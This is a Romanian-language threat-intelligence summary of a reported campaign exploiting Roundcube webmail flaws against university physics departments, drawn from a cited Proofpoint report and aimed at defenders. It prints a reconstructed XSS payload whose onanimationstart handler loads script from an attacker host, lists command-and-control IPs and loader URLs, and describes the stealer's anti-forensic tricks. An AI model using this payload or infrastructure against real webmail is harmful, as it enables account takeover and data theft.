MassTraction Spec
Threat Intelligence | Campanie activă din mai 2026

Un singur e-mail deschis, un întreg server cedat

Din mai 2026, actorul statal UNK_MassTraction exploatează n-day-uri în serverele de mail Roundcube ale departamentelor de fizică din universități nord-americane. Nu este o scurgere de date convențională (atacul folosește browserul victimei drept pivot pentru a injecta implanturi în memorie).

Notă de analiză: UNK_MassTraction indică grupuri de activitate în dezvoltare, nesuficient monitorizate pentru o clasificare numerică oficială de tip TA.

CVE-2024-42009 XSS în Roundcube declanșat la deschiderea mailului
CVE-2025-49113 deserializare în engine-ul Crypt_GPG pentru execuție
IceCube & SquareShell payload-uri de furt de credențiale și webshell timestomped
VShell Backdoor implant persistent în Go rulat direct în memoria RAM

Coordonatele atacului

Ce știm sigur

Campania vizează cadre universitare și administratori din departamente de astrofizică și fizica particulelor, cu legături în securitatea națională. Atacatorul folosește domenii compromise sau vulnerabile la spoofing din cauza politicilor DMARC laxe.

Ce rămâne incert

Nu se cunoaște numărul total de universități afectate din afara radarului de monitorizare. Scopul pe termen lung depășește furtul de e-mailuri (atacatorii folosesc serverele compromise ca noduri de rețea pentru a penetra adânc în rețelele interne).

De ce contează

Infiltrarea demonstrează că serverele de webmail expuse sunt tratate ca echipamente de margine (asemănătoare concentratoarelor VPN). Compromiterea lor nu este blocată de scanerele AI clasice din cauza payload-urilor stocate în memorie.

Lanțul de exploatare (Faza Browser vs. Server)

Urmărește mecanica atacului pas cu pas. Fiecare stadiu reprezintă o trecere de la acțiunile efemere din browserul clientului la un backdoor persistent pe server.

Browser Space (Client)

Server Space (Roundcube)

Acțiune & Impact

Un e-mail malițios cu cod HTML special conceput este trimis către victimă. Când e-mailul este deschis în clientul webmail Roundcube, lipsa igienizării tagurilor HTML permite rularea de cod JavaScript arbitrar prin evenimentul onanimationstart.

Cod Sursă / Payload Reconstruit

<div style="animation: xss 0s;" onanimationstart="
  let script = document.createElement('script');
  script.src = 'https://45.150.109.151.sslip.io:23088/app/js/jquery.min.js';
  document.body.appendChild(script);
"></div>

Remediere Arhitecturală

Aplicarea corectă a politicilor Content Security Policy (CSP) care blochează execuția scripturilor inline și conexiunile către domenii externe nesalvate în lista de încredere.

Cum ascunde atacul urmele

IceCube nu se bazează pe o sesiune de browser deschisă nelimitat. Acesta monitorizează comportamentul utilizatorului și folosește evenimentele browserului pentru a relansa exploit-uri și a șterge urmele.

Starea Monitorului de Activitate

Eveniment: Utilizatorul încearcă să închidă tabul webmail
Persistență: Execută un apel asincron asigurat de tip beacons înainte de descărcarea DOM pentru a trimite ultimele date colectate.
Urme Forenzice: Distruge stările active locale și forțează deconectarea pe server pentru a șterge sesiunea PHP compromisă.
Acțiune Utilizator ---> [ TRIGGER DEFER ] ---> Distrugere Sesiune & Logs

Semnătură AI vs. Securitate prin Arhitectură

Metodele clasice bazate pe scanarea fișierelor sau pe reguli simple de inteligență artificială eșuează în fața elementelor rulate doar în memorie. Vezi cum se compară mecanismele defensive în fiecare punct critic al atacului.

Eficacitate pe Etapele Atacului

Exploatare XSS (E-mail) Permis (Nenotificat)
IceCube (Stealer JS) Permis (Nenotificat)
CSRF & Pivot Permis (Nenotificat)
Deserializare PHP Permis (Nenotificat)
SquareShell Webshell Permis (Nenotificat)
Backdoor VShell Permis (Nenotificat)

Indicatori de compromitere (IoC)

Indicator Tip Descriere Prima Observare
45.150.109.151 IP Address Server de livrare payload-uri IceCube și server de Comandă și Control (C&C) Mai 2026
194.213.18.133 IP Address Server de livrare payload-uri IceCube și server de Comandă și Control (C&C) Iunie 2026
45.86.229.111 IP Address Server de Comandă și Control (C&C) utilizat pentru backdoor-ul VShell Iunie 2026
https://45.150.109.151.sslip.io:23088/app/js/jquery.min.js URL URL utilizat pentru încărcarea loaderului JavaScript IceCube Mai 2026
https://194.213.18.133.sslip.io:23088/app/js/jquery.min.js URL URL utilizat pentru încărcarea loaderului JavaScript IceCube Iunie 2026
http://45.86.229.111/slw:8080 URL Adresă de descărcare a loaderului VShell (SNOWLIGHT) Iunie 2026
a02f124c5ce4180bd130a62ee03262f399c33491de3aed36e0b15155ae4926c0 SHA256 Codul hash SHA256 al loaderului malițios de browser IceCube Iunie 2026

Surse de documentare

Proofpoint Threat Research Team One Email Closer to the Edge: UNK_MassTraction & the Physics of Exploitation Publicat la 7 iulie 2026. Autori: Greg Lesnewich, Mark Kelly și echipa Proofpoint.

Statut juridic și editorial: Această analiză tratează materialul Proofpoint drept document primar de cercetare. Detaliile tehnice ale exploit-urilor CVE-2024-42009 și CVE-2025-49113 sunt incluse cu scop didactic și ilustrativ. Denumirile și indicatorii sunt conforme cu investigația originală.